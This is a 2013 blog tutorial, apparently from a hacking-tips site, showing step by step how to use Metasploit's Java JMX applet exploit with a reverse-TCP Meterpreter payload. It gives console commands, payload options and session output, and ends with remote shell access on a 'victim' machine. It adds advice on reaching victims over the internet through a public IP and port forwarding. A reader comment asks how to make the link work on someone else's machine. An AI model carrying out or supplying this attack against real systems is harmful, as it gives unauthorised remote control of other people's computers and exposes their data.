Hack windows/linux/mac with metasploit | Java Applet JMX Remote Code Execution

5 Flares Filament.io 5 Flares ×

Java Applet JMX Remote Code Execution

Java exploits are client side exploits that mostly target browsers to run arbitrary command on the system. These exploits are put up on a webpage in the form of a java applet. When a victim visits the url and allows the applet to run, the java runtime or JRE is exploited to execute arbitrary command on the system and get control.

The "JMX Remote Code Execution" exploit is a recent one that has been exploited a lot in Feb 2013. It exploits the jmx classes in a java applet. The vulnerability is present in Sun Java JRE 7 till update 11. This is a generic jre exploit, which means that it would be able to exploit any os, any browser that is running the vulnerable jre version.

A POC code of the exploit has been posted here.

Exploit with metasploit

Search for the java exploit.

msf > search exploit java multi browser

Matching Modules
================

   Name                                                                  Disclosure Date          Rank       Description
   ----                                                                  ---------------          ----       -----------
   exploit/multi/browser/firefox_escape_retval                           2009-07-13 00:00:00 UTC  normal     Firefox 3.5 escape() Return Value Memory Corruption
   exploit/multi/browser/firefox_xpi_bootstrapped_addon                  2007-06-27 00:00:00 UTC  excellent  Mozilla Firefox Bootstrapped Addon Social Engineering Code Execution
   exploit/multi/browser/java_atomicreferencearray                       2012-02-14 00:00:00 UTC  excellent  Java AtomicReferenceArray Type Violation Vulnerability
   exploit/multi/browser/java_calendar_deserialize                       2008-12-03 00:00:00 UTC  excellent  Sun Java Calendar Deserialization Privilege Escalation
   exploit/multi/browser/java_getsoundbank_bof                           2009-11-04 00:00:00 UTC  great      Sun Java JRE getSoundbank file:// URI Buffer Overflow
   exploit/multi/browser/java_jre17_exec                                 2012-08-26 00:00:00 UTC  excellent  Java 7 Applet Remote Code Execution
   exploit/multi/browser/java_jre17_glassfish_averagerangestatisticimpl  2012-10-16 00:00:00 UTC  excellent  Java Applet AverageRangeStatisticImpl Remote Code Execution
   exploit/multi/browser/java_jre17_jaxws                                2012-10-16 00:00:00 UTC  excellent  Java Applet JAX-WS Remote Code Execution
   exploit/multi/browser/java_jre17_jmxbean                              2013-01-10 00:00:00 UTC  excellent  Java Applet JMX Remote Code Execution
   exploit/multi/browser/java_jre17_jmxbean_2                            2013-01-19 00:00:00 UTC  excellent  Java Applet JMX Remote Code Execution
   exploit/multi/browser/java_jre17_method_handle                        2012-10-16 00:00:00 UTC  excellent  Java Applet Method Handle Remote Code Execution
   exploit/multi/browser/java_rhino                                      2011-10-18 00:00:00 UTC  excellent  Java Applet Rhino Script Engine Remote Code Execution
   exploit/multi/browser/java_rmi_connection_impl                        2010-03-31 00:00:00 UTC  excellent  Java RMIConnectionImpl Deserialization Privilege Escalation
   exploit/multi/browser/java_setdifficm_bof                             2009-11-04 00:00:00 UTC  great      Sun Java JRE AWT setDiffICM Buffer Overflow
   exploit/multi/browser/java_signed_applet                              1997-02-19 00:00:00 UTC  excellent  Java Signed Applet Social Engineering Code Execution
   exploit/multi/browser/java_trusted_chain                              2010-03-31 00:00:00 UTC  excellent  Java Statement.invoke() Trusted Method Chain Privilege Escalation
   exploit/multi/browser/java_verifier_field_access                      2012-06-06 00:00:00 UTC  excellent  Java Applet Field Bytecode Verifier Cache Remote Code Execution
   exploit/multi/browser/mozilla_navigatorjava                           2006-07-25 00:00:00 UTC  normal     Mozilla Suite/Firefox Navigator Object Code Execution
   exploit/multi/browser/qtjava_pointer                                  2007-04-23 00:00:00 UTC  excellent  Apple QTJava toQTPointer() Arbitrary Memory Access
   exploit/multi/misc/batik_svg_java                                     2012-05-11 00:00:00 UTC  excellent  Squiggle 1.7 SVG Browser Java Code Execution
   exploit/windows/browser/imgeviewer_tifmergemultifiles                 2010-03-03 00:00:00 UTC  normal     Viscom Image Viewer CP Pro 8.0/Gold 6.0 ActiveX Control
   exploit/windows/browser/java_docbase_bof                              2010-10-12 00:00:00 UTC  great      Sun Java Runtime New Plugin docbase Buffer Overflow
   exploit/windows/browser/ms05_054_onload                               2005-11-21 00:00:00 UTC  normal     MS05-054 Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution
   exploit/windows/browser/teechart_pro                                  2011-08-11 00:00:00 UTC  normal     TeeChart Professional ActiveX Control <= 2010.0.0.3 Trusted Integer Dereference






The exploit is this one

exploit/multi/browser/java_jre17_jmxbean_2

Use the info command to get the description

This module abuses the JMX classes from a Java Applet to run 
  arbitrary Java code outside of the sandbox as exploited in the wild 
  in February of 2013. Additionally, this module bypasses default 
  security settings introduced in Java 7 Update 10 to run unsigned 
  applet without displaying any warning to the user.

Setup a vulnerable system

To test out this exploit we need a vulnerable system. For this I have setup windows xp with sun java jre-7u10. Thats java runtime version 7 update 10. Note that this exploit will not work on java version 6. It works only on version 7 till update 11. The jre installation file name is "jre-7u10-windows-i586.exe". Download it from somewhere and install.
And for the browser, any browser should work fine.

Select exploit

msf > use exploit/multi/browser/java_jre17_jmxbean_2

Check the options

msf exploit(java_jre17_jmxbean_2) > show options

Module options (exploit/multi/browser/java_jre17_jmxbean_2):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_jre17_jmxbean_2) >

The srvhost and srvport are the host and port on which a web server will be run to serve the exploit webpage with the applet. Ideally the port number should be 80 so that the port number need not be mentioned in the url. But in this case we shall use 8080. The SRVHOST can be left 0.0.0.0 which means local system. Set the URIPATH to / so that the url is small.

msf exploit(java_jre17_jmxbean_2) > set URIPATH /

Select payload

Next check the payloads compatible with this exploit.

msf exploit(java_jre17_jmxbean_2) > show payloads

Compatible Payloads
===================

   Name                            Disclosure Date  Rank    Description
   ----                            ---------------  ----    -----------
   generic/custom                                   normal  Custom Payload
   generic/shell_bind_tcp                           normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                        normal  Generic Command Shell, Reverse TCP Inline
   java/meterpreter/bind_tcp                        normal  Java Meterpreter, Java Bind TCP Stager
   java/meterpreter/reverse_http                    normal  Java Meterpreter, Java Reverse HTTP Stager
   java/meterpreter/reverse_https                   normal  Java Meterpreter, Java Reverse HTTPS Stager
   java/meterpreter/reverse_tcp                     normal  Java Meterpreter, Java Reverse TCP Stager
   java/shell/bind_tcp                              normal  Command Shell, Java Bind TCP Stager
   java/shell/reverse_tcp                           normal  Command Shell, Java Reverse TCP Stager
   java/shell_reverse_tcp                           normal  Java Command Shell, Reverse TCP Inline

msf exploit(java_jre17_jmxbean_2) >

We are going to use java/meterpreter/reverse_tcp

msf exploit(java_jre17_jmxbean_2) > set payload java/meterpreter/reverse_tcp
payload => java/meterpreter/reverse_tcp
msf exploit(java_jre17_jmxbean_2) >

Check the options once again.

msf exploit(java_jre17_jmxbean_2) > show options

Module options (exploit/multi/browser/java_jre17_jmxbean_2):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT     8080             yes       The local port to listen on.
   SSL         false            no        Negotiate SSL for incoming connections
   SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
   SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
   URIPATH                      no        The URI to use for this exploit (default is random)


Payload options (java/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Generic (Java Payload)


msf exploit(java_jre17_jmxbean_2) >

Now the payload options are visible in the options lists. The LHOST and LPORT are the host and port on which the reverse shell handler will listen. The important thing to note over here is that the LHOST and LPORT should be reachable by the victim machine. When on a local network, the LHOST can be set to your LAN ip (for example 192.168.1.33). However when over the internet, the victim machine connects to you through your public internet ip. In that case the LHOST should be your public internet IP address. And if your machine (hacker machine) is behind a router that port forwarding must be setup properly for LPORT, so that incoming connections are send to LPORT.

msf exploit(java_jre17_jmxbean_2) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(java_jre17_jmxbean_2) > set LPORT 5555
LPORT => 5555
msf exploit(java_jre17_jmxbean_2) >

Now that we have setup our options correctly, its time to run the exploit.

msf exploit(java_jre17_jmxbean_2) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.1.33:5555 
[*] Using URL: http://0.0.0.0:8080/
msf exploit(java_jre17_jmxbean_2) > [*]  Local IP: http://192.168.1.33:8080/
[*] Server started.

Metasploit informs us that the reverse shell handler has been started, and the server to serve the java exploit page has also been started. The victim now has to access the url "http://192.168.1.33:8080/" in order to run the java exploit. Once the java applet is loaded and run the exploit will run and metasploit will get a meterpreter session.

So go to your vulnerable machine setup and open the url in a browser.

Meterpreter

Once the url is opened, metasploit will start sending the exploit payloads etc and if everything goes fine, the meterpreter sessions should start.

msf exploit(java_jre17_jmxbean_2) > 
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending HTML
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /favicon.ico
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /lEUioG.jar
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending JAR
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /lEUioG.jar
[*] 192.168.1.4      java_jre17_jmxbean_2 - Sending JAR
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ClassBeanInfo.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ObjectBeanInfo.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ObjectCustomizer.class
[*] 192.168.1.4      java_jre17_jmxbean_2 - handling request for /java/lang/ClassCustomizer.class
[*] Sending stage (30246 bytes) to 192.168.1.4
[*] Meterpreter session 1 opened (192.168.1.33:5555 -> 192.168.1.4:1065) at 2013-05-16 23:01:46 -0700

So meterpreter session started successfully.

msf exploit(java_jre17_jmxbean_2) > sessions -l

Active sessions
===============

  Id  Type                   Information               Connection
  --  ----                   -----------               ----------
  1   meterpreter java/java  enlightened @ ----------  192.168.1.33:5555 -> 192.168.1.4:1065 (192.168.1.4)

msf exploit(java_jre17_jmxbean_2) > session -i 1
[-] Unknown command: session.
msf exploit(java_jre17_jmxbean_2) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > pwd
C:\Program Files\Google\Chrome\Application\26.0.1410.64

We have successfully hacked the victim machine. Play with it!!

Last Updated On : 21st May 2013

Subscribe to get updates delivered to your inbox

About Silver Moon

Php developer, blogger and Linux enthusiast. He can be reached at m00n.silv3r@gmail.com. Or find him on

  • Alex

    i did
    srvhost =my internal ip
    lhost = public ip
    lport= 55
    and i use simple modem device to use internet, but when i sent the link to someone over the internet, it doesn NOTHING,
    what should i do, to use it over the internet
    when i use it in another computer connecting same network, it works perfect tho

5 Flares Twitter 1 Facebook 4 Google+ 0 LinkedIn 0 StumbleUpon 0 Filament.io 5 Flares ×